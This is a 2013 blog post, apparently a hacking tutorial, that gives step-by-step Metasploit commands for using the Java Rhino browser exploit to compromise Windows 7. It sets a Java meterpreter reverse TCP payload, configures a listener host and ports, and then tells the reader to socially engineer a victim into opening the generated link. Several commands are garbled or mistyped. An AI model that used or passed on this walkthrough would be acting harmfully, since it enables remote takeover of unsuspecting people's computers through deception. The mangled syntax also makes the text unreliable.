Sunday, January 13, 2013

Browser exploit series (1) JAVA Rhino exploit

backtrack, backtrack 5, linux, hacking, tutorial, hacking tutorial, ethical hacking, pentest, penetration testing, pc, wpa, wpa2, metasploit, nmap, browser exploit



Today we are going to pawn windows 7 with a java exploit called: JAVA RHINO Exploit. Here i quote from the Armitage console's description of the exploit:" This module exploits a vulnerability in the Rhinio Script Engine that can be used by Java Applet to run an arbitrary code outside of the sandbox" The vulnerability affects version 7 and earlier versions, and should work on any browser: firefox, safari, internet explorer, google chrome etc...
First of all, you have to update the metasploit svn by the custom command #msfupdate#, to make sure that the above exploit is included in your Backtrack exploits database. Then run:

ccmsfconsole

Then type this command:

#use exploit/multi/browser/java_rhino

Then again, this command:

#set payload/java/meterpreter/reverse/tcp


backtrack, hacking, windows, metasploit, firefox, penetration testing


At this level, type these commands, the first one is meant to set up the server:

#set srvhost 192.168.1.6

In this case: 192.168.1.6 is my internal ip, you have to change this value with your own ip. If you don't know how to get your ip address, just open a ternimal and type: #if config.The next command will define the port of the server which is usually port 80.

#set srvport 80

Next command is for setting up the path of the exploit:

#set uripath java_rhino

# set lhost 192.168.1.6

#set lport 443




Notice also that the srvhost & the lhost have the same ip address. Finally, type this command and wait for a connection:


#exploit


backtrack, hacking, windows, metasploit, firefox, penetration testing






As you may notice here, a link has been generated for you: Local IP://192.168.1.6:80/java_rhino, you have to copy the link and send it to your victim. Once you succeed in "social engineering" the link to a victim, the sending stage starts, and you'll have a java meterpreter session.




backtrack, hacking, windows, metasploit, firefox, penetration testing

0 commentaires: